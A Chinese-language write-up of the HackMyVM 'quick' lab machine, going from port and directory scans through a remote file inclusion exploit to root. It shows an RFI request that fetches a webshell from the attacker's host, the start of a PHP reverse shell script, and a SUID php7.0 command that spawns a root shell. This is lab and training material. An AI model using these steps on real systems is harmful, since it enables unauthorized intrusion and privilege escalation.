hmv[-_-]quick

quick

image-20240317144102239

扫描一下:

image-20240321010459945

阔以!

信息搜集

端口扫描

sudo nmap -Pn 10.0.2.8
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:41:D3:56 (Oracle VirtualBox virtual NIC)
nmap -sV -sT -T4 -p- 10.0.2.8
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

看来真没东西了。

目录扫描

feroxbuster -u http://10.0.2.8
301      GET        9l       28w      305c http://10.0.2.8/images => http://10.0.2.8/images/
200      GET       88l      342w     3735c http://10.0.2.8/index.php
200      GET      314l     2467w   220000c http://10.0.2.8/images/logo.png
200      GET     2190l    12161w   863176c http://10.0.2.8/images/joe.jpeg
200      GET     2740l    14581w  1058919c http://10.0.2.8/images/jane.jpeg
200      GET      134l      799w    59813c http://10.0.2.8/images/pexels-adrian-newell-6968984.jpg
200      GET      255l     1417w   103988c http://10.0.2.8/images/pexels-mike-bird-190537.jpg
200      GET      261l      453w     4038c http://10.0.2.8/styles.css
200      GET       88l      342w     3735c http://10.0.2.8/
200      GET     1795l    10935w   818584c http://10.0.2.8/images/pexels-pixabay-38570.jpg
200      GET      157l      983w    66146c http://10.0.2.8/images/pexels-ishan-kulshrestha-9334971.jpg

以防万一FUZZ一下:

ffuf -u http://10.0.2.8/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
images                  [Status: 301, Size: 305, Words: 20, Lines: 10, Duration: 115ms]
server-status           [Status: 403, Size: 273, Words: 20, Lines: 10, Duration: 0ms]

没啥东西了,开撤!

漏洞扫描

nikto -h http://10.0.2.8
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.0.2.8
+ Target Hostname:    10.0.2.8
+ Target Port:        80
+ Start Time:         2024-03-20 13:20:16 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /images/: Directory indexing found.
+ /index.php: Output from the phpinfo() function was found.
+ /index.php?page=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ 8102 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2024-03-20 13:20:33 (GMT-4) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

漏洞利用

RFI漏洞利用

扫出来了一个RFI漏洞:

http://10.0.2.8/index.php?page=http://10.0.2.4:8888/webshell

image-20240321013444703

# head webshell.php
<?php
  // php-reverse-shell - A Reverse Shell implementation in PHP
  // Copyright (C) 2007 pentestmonkey@pentestmonkey.net

  set_time_limit (0);
  $VERSION = "1.0";
  $ip = '10.0.2.8';  // You have changed this
  $port = 1234;  // And this
  $chunk_size = 1400;

实际上,就算没有打全,只打前几个字母,也可以请求到正确的文件!

提权

扩展shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

发现suid漏洞

image-20240321013843945

这个php7.0明显有suid:https://gtfobins.github.io/gtfobins/php/

/usr/bin/php7.0 -r "pcntl_exec('/bin/sh', ['-p']);"

寻找flag

image-20240321014151243

image-20240321014203052

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇